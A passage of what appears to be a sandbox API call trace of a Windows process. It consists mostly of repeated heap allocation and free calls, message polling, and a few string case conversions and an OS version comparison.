wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0199.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0199.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0199.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0199.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0199.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0199.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0199.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0199.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0199.128] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0199.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0199.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0199.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0199.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0199.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0199.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0199.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0199.129] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0199.129] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0199.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0199.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0199.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0199.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0199.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0199.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0199.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0199.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0199.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0199.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0199.130] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0199.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0199.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0199.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0199.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0199.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0199.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0199.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0199.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0199.130] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0199.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0199.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0199.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0199.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0199.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0199.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0199.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0199.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0199.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0199.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0199.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0199.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0199.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0199.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0199.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0199.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0199.131] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0199.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0199.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0199.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0199.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0199.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0199.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0199.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0199.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0199.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0199.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0199.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0199.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0199.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0199.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0199.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0199.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0199.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0199.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0199.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0199.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0199.133] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0199.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0199.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0199.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0199.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0199.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24b30f8 [0199.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0199.134] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0199.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0199.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0199.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9dc8 [0199.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0199.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0199.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d50 [0199.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0199.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0199.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0199.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0199.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0199.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b30f8 | out: hHeap=0x25c0000) returned 1 [0199.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0199.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0199.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0199.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0199.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0199.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0199.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0199.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0199.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0199.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0199.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0199.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0199.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0199.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0199.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0199.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0199.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0199.136] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0199.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0199.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0199.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0199.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0199.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0199.137] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0199.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0199.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0199.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f30 [0199.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0199.137] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0199.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0199.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0199.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0199.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0199.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0199.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0199.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0199.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0199.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0199.138] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0199.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0199.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0199.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0199.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0199.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0199.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0199.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0199.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0199.138] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0199.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0199.138] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0199.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0199.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0199.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0199.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0199.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0199.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0199.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0199.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0199.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0199.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0199.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0199.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0199.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0199.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0199.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0199.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0199.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0199.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0199.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0199.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0199.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0199.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0199.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0199.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0199.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0199.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0199.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0199.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0199.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0199.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0199.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0199.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0199.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0199.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0199.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0199.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0199.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.141] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0199.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0199.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0199.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0199.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0199.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0199.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0199.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0199.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0199.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0199.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0199.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0199.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0199.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0199.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0199.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0199.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0199.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0199.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 